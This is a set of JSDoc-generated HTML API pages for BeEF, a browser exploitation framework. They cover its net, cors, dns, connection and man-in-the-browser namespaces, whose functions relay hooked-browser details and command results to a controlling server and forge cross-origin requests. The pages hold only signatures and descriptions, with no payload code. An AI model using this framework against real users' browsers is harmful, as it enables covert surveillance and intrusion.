<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line118">line 118</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".sniff"><span class="type-signature">(static) </span>sniff<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Relays an entry to the framework</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="mitb.js.html">mitb.js</a>, <a href="mitb.js.html#line232">line 232</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.connection.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: connection</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: connection</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>connection</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>beef.net.connection - wraps Mozilla's Network Information API
https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation
https://developer.mozilla.org/en-US/docs/Web/API/Navigator/connection</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_connection.js.html">net/connection.js</a>, <a href="net_connection.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".downlinkMax"><span class="type-signature">(static) </span>downlinkMax<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Returns the maximum downlink speed of the connection. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/downlinkMax</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_connection.js.html">net/connection.js</a>, <a href="net_connection.js.html#line36">line 36</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>downlink max or 'unknown'.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h5>Example</h5>
<pre class="prettyprint"><code>beef.net.connection.downlinkMax()</code></pre>
<h4 class="name" id=".type"><span class="type-signature">(static) </span>type<span class="signature">()</span><span class="type-signature"> → {String}</span></h4>
<div class="description">
<p>Returns the connection type. https://developer.mozilla.org/en-US/docs/Web/API/NetworkInformation/type</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_connection.js.html">net/connection.js</a>, <a href="net_connection.js.html#line20">line 20</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>connection type or 'unknown'.</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">String</span>
</dd>
</dl>
<h5>Example</h5>
<pre class="prettyprint"><code>beef.net.connection.type()</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.cors.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: cors</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: cors</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>cors</h2>
</header>
<article>
<div class="container-overview">
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_cors.js.html">net/cors.js</a>, <a href="net_cors.js.html#line1">line 1</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".request"><span class="type-signature">(static) </span>request<span class="signature">(method, url, data, timeout, callback)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Make a cross-origin request using CORS</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>method</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>HTTP verb ('GET', 'POST', 'DELETE', etc.)</p></td>
</tr>
<tr>
<td class="name"><code>url</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>url</p></td>
</tr>
<tr>
<td class="name"><code>data</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>request body</p></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
<span class="param-type">Integer</span>
</td>
<td class="description last"><p>request timeout in milliseconds</p></td>
</tr>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last"><p>function to callback on completion</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_cors.js.html">net/cors.js</a>, <a href="net_cors.js.html#line27">line 27</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".response"><span class="type-signature">(static) </span>response<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Response Object - used in the beef.net.request callback</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_cors.js.html">net/cors.js</a>, <a href="net_cors.js.html#line12">line 12</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.dns.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: dns</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: dns</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="beef.net.html">.net</a>.</span>dns</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>request object structure:</p>
<ul>
<li>msgId: {Integer} Unique message ID for the request.</li>
<li>domain: {String} Remote domain to retrieve the data.</li>
<li>wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED</li>
<li>callback: {Function} Callback function to receive the number of requests sent.</li>
</ul></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_dns.js.html">net/dns.js</a>, <a href="net_dns.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".send"><span class="type-signature">(static) </span>send<span class="signature">(msgId, data, domain, callback)</span><span class="type-signature"></span></h4>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>msgId</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>data</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>domain</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net_dns.js.html">net/dns.js</a>, <a href="net_dns.js.html#line27">line 27</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html> |
HTML | beef/docs/beef.net.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Namespace: net</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Namespace: net</h1>
<section>
<header>
<h2>net</h2>
</header>
<article>
<div class="container-overview">
<div class="description"><p>Provides basic networking functions,
like beef.net.request and beef.net.forgeRequest,
used by BeEF command modules and the Requester extension,
as well as beef.net.send which is used to return commands
to BeEF server-side components.</p>
<p>Also, it contains the core methods used by the XHR-polling
mechanism (flush, queue)</p></div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line7">line 7</a>
</li></ul></dd>
</dl>
</div>
<h3 class="subsection-title">Namespaces</h3>
<dl>
<dt><a href="beef.net.connection.html">connection</a></dt>
<dd></dd>
<dt><a href="beef.net.cors.html">cors</a></dt>
<dd></dd>
<dt><a href="beef.net.dns.html">dns</a></dt>
<dd></dd>
<dt><a href="beef.net.local.html">local</a></dt>
<dd></dd>
<dt><a href="beef.net.portscanner.html">portscanner</a></dt>
<dd></dd>
<dt><a href="beef.net.requester.html">requester</a></dt>
<dd></dd>
<dt><a href="beef.net.xssrays.html">xssrays</a></dt>
<dd></dd>
</dl>
<h3 class="subsection-title">Methods</h3>
<h4 class="name" id=".array_has_string_key"><span class="type-signature">(static) </span>array_has_string_key<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Detects if an array has a string key</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line507">line 507</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".browser_details"><span class="type-signature">(static) </span>browser_details<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Sends back browser details to framework, calling beef.browser.getDetails()</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line550">line 550</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".chunk"><span class="type-signature">(static) </span>chunk<span class="signature">(str, amount)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Split the input data into chunk lengths determined by the amount parameter.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>str</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the input data</p></td>
</tr>
<tr>
<td class="name"><code>amount</code></td>
<td class="type">
<span class="param-type">Integer</span>
</td>
<td class="description last"><p>chunk length</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line179">line 179</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".clean"><span class="type-signature">(static) </span>clean<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line496">line 496</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".command"><span class="type-signature">(static) </span>command<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Command object. This represents the data to be sent back to BeEF,
using the beef.net.send() method.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line35">line 35</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".flush"><span class="type-signature">(static) </span>flush<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Flush all currently queued command results to the framework,
chopping the data in chunks ('chunk' method) which will be re-assembled
server-side by the network stack.
NOTE: currently 'flush' is used only with the default
XHR-polling mechanism. If WebSockets are used, the data is sent
back to BeEF straight away.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line147">line 147</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".forge_request"><span class="type-signature">(static) </span>forge_request<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:</p>
<ul>
<li>requestid: needed on the callback</li>
<li>allowCrossDomain: set cross-domain requests as allowed or blocked</li>
</ul>
<p>forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
Example usage:
beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
alert(response.response_body)})</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line321">line 321</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".is_valid_ip"><span class="type-signature">(static) </span>is_valid_ip<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the specified IP address is valid</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line530">line 530</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".is_valid_ip_range"><span class="type-signature">(static) </span>is_valid_ip_range<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the specified IP address range is valid</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line540">line 540</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".is_valid_port"><span class="type-signature">(static) </span>is_valid_port<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Checks if the specified port is valid</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line521">line 521</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".packet"><span class="type-signature">(static) </span>packet<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Packet object. A single chunk of data. X packets -> 1 stream</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line46">line 46</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".push"><span class="type-signature">(static) </span>push<span class="signature">(stream)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Push the input stream back to the BeEF server-side components.
It uses beef.net.request to send back the data.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>stream</code></td>
<td class="type">
<span class="param-type">Object</span>
</td>
<td class="description last"><p>the stream object to be sent back.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line189">line 189</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".queue"><span class="type-signature">(static) </span>queue<span class="signature">(handler, cid, results, status, callback)</span><span class="type-signature"></span></h4>
<div class="description">
<p>Queues the specified command results.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>handler</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the server-side handler that will be called</p></td>
</tr>
<tr>
<td class="name"><code>cid</code></td>
<td class="type">
<span class="param-type">Integer</span>
</td>
<td class="description last"><p>command id</p></td>
</tr>
<tr>
<td class="name"><code>results</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the data to send</p></td>
</tr>
<tr>
<td class="name"><code>status</code></td>
<td class="type">
<span class="param-type">Integer</span>
</td>
<td class="description last"><p>the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')</p></td>
</tr>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last"><p>the function to call after execution</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line91">line 91</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".request"><span class="type-signature">(static) </span>request<span class="signature">(scheme, method, domain, port, path, anchor, data, timeout, dataType, callback)</span><span class="type-signature"> → {Object}</span></h4>
<div class="description">
<p>Performs http requests</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>scheme</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>HTTP or HTTPS</p></td>
</tr>
<tr>
<td class="name"><code>method</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>GET or POST</p></td>
</tr>
<tr>
<td class="name"><code>domain</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>bindshell.net, 192.168.3.4, etc</p></td>
</tr>
<tr>
<td class="name"><code>port</code></td>
<td class="type">
<span class="param-type">Int</span>
</td>
<td class="description last"><p>80, 5900, etc</p></td>
</tr>
<tr>
<td class="name"><code>path</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>/path/to/resource</p></td>
</tr>
<tr>
<td class="name"><code>anchor</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>this is the value that comes after the # in the URL</p></td>
</tr>
<tr>
<td class="name"><code>data</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>This will be used as the query string for a GET or post data for a POST</p></td>
</tr>
<tr>
<td class="name"><code>timeout</code></td>
<td class="type">
<span class="param-type">Int</span>
</td>
<td class="description last"><p>timeout the request after N seconds</p></td>
</tr>
<tr>
<td class="name"><code>dataType</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>specify the data return type expected (ie text/html/script)</p></td>
</tr>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last"><p>call the callback function at the completion of the method</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line219">line 219</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>this object contains the response details</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Object</span>
</dd>
</dl>
<h4 class="name" id=".response"><span class="type-signature">(static) </span>response<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Response Object - used in the beef.net.request callback
NOTE: as we are using async mode, the response object will be empty if returned.
Using sync mode, request obj fields will be populated.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line72">line 72</a>
</li></ul></dd>
</dl>
<h4 class="name" id=".send"><span class="type-signature">(static) </span>send<span class="signature">(handler, cid, results, exec_status, callback)</span><span class="type-signature"> → {Integer}</span></h4>
<div class="description">
<p>Queues the current command results and flushes the queue straight away.
NOTE: Always send Browser Fingerprinting results
(beef.net.browser_details(); -> /init handler) using normal XHR-polling,
even if WebSockets are enabled.</p>
</div>
<h5>Parameters:</h5>
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>handler</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the server-side handler that will be called</p></td>
</tr>
<tr>
<td class="name"><code>cid</code></td>
<td class="type">
<span class="param-type">Integer</span>
</td>
<td class="description last"><p>command id</p></td>
</tr>
<tr>
<td class="name"><code>results</code></td>
<td class="type">
<span class="param-type">String</span>
</td>
<td class="description last"><p>the data to send</p></td>
</tr>
<tr>
<td class="name"><code>exec_status</code></td>
<td class="type">
<span class="param-type">Integer</span>
</td>
<td class="description last"><p>the result of the command execution (-1, 0 or 1 for 'error', 'unknown' or 'success')</p></td>
</tr>
<tr>
<td class="name"><code>callback</code></td>
<td class="type">
<span class="param-type">function</span>
</td>
<td class="description last"><p>the function to call after execution</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line115">line 115</a>
</li></ul></dd>
</dl>
<h5>Returns:</h5>
<div class="param-desc">
<p>the command module execution status (defaults to 0 - 'unknown' if status is null)</p>
</div>
<dl>
<dt>
Type
</dt>
<dd>
<span class="param-type">Integer</span>
</dd>
</dl>
<h4 class="name" id=".stream"><span class="type-signature">(static) </span>stream<span class="signature">()</span><span class="type-signature"></span></h4>
<div class="description">
<p>Stream object. Contains X packets, which are command result chunks.</p>
</div>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="net.js.html">net.js</a>, <a href="net.js.html#line54">line 54</a>
</li></ul></dd>
</dl>
</article>
</section>
</div>
<nav>
